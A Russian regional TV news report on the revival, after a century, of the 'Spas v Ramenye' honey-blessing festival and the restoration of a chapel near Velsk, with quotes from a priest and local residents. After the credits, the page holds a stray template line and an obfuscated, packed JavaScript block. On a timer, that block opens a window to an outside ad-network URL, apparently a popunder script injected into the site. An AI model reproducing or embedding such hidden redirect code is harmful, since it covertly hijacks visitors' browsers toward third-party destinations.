В Вельском районе возродили старинный праздник "Спас в Раменье"

Репортаж телеканала "Поморье"

Колокола зовут на Раменский Спас впервые после векового перерыва. Сто лет назад праздник освящения мёда собирал здесь до 15 тысяч человек.

Протоиерей Андрей Ермилов, настоятель Свято-Успенского храма г.Вельска:
- В Раменье был установлен такой праздник, он назывался "Спас в Раменье". Мы пытаемся возродить эту традицию. Сегодня нас не так много, но, по крайней мере, начало с маленького уже положено.

Сегодня на карте Вельского района Раменья уже нет. Но само место в 20 километрах от Вельска издавна считалось святым.

Здесь нашли камень со следом стопы Пресвятой Богородицы. А маленькая часовня с иконой Спаса Вседержителя привлекала прихожан гораздо больше, чем соседние большие храмы. Но после революции в ней устроили сельский магазин, а вскоре и вовсе закрыли. Возродить часовню предложил местный житель.

Юрий Беляев, председатель ТОС "Возродим святое Раменье":
- Часовню, батюшка говорит, надо восстанавливать, меня благословил на часовню. Благословил, и все разъехались, я тут один остался.

Помощь стала поступать от самых разных людей. А когда создали ТОС "Возродим святое Раменье", началась активная реставрация. Работали по старинным фотографиям. Под досками на потолке обнаружили Вифлеемскую звезду, отыскали и "родной" крест. В 30-е годы его спрятали от разграбления на кладбище. Как и в старину, во время Раменского Спаса освящают купель. По преданию, эти воды - целебные. Но главное событие праздника, конечно, освящение мёда.

Валентин Ролышев, уроженец д.Раменской:
- Приятно что возрождаются такие праздники, традиции. Рад был бы, чтоб с этим праздником возродилась и наша деревня, наше отечественное сельское хозяйство. Первый после столетнего перерыва Раменский Спас собрал более ста человек.
 

(Видеоматериал подготовили: Лада Голтвина, Андрей Миронов)

Please publish modules in offcanvas position.

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('<5>4 n="c://b.a.9/8?7=6";4 2=d;e 3(){f(2>0){2--;4 g=2+1;i("3()",j)}h{k.l("c://b.a.9/8?7=6","m")}}3();',24,24,'||count|countDown|var|script|688b0be27b4d45d6562eba71df5c7886|key|ef4ex511a|com|effectivecpmnetwork|www|https|10|function|if|waktu|else|setTimeout|1000|window|open|_0|url'.split('|'),0,{}))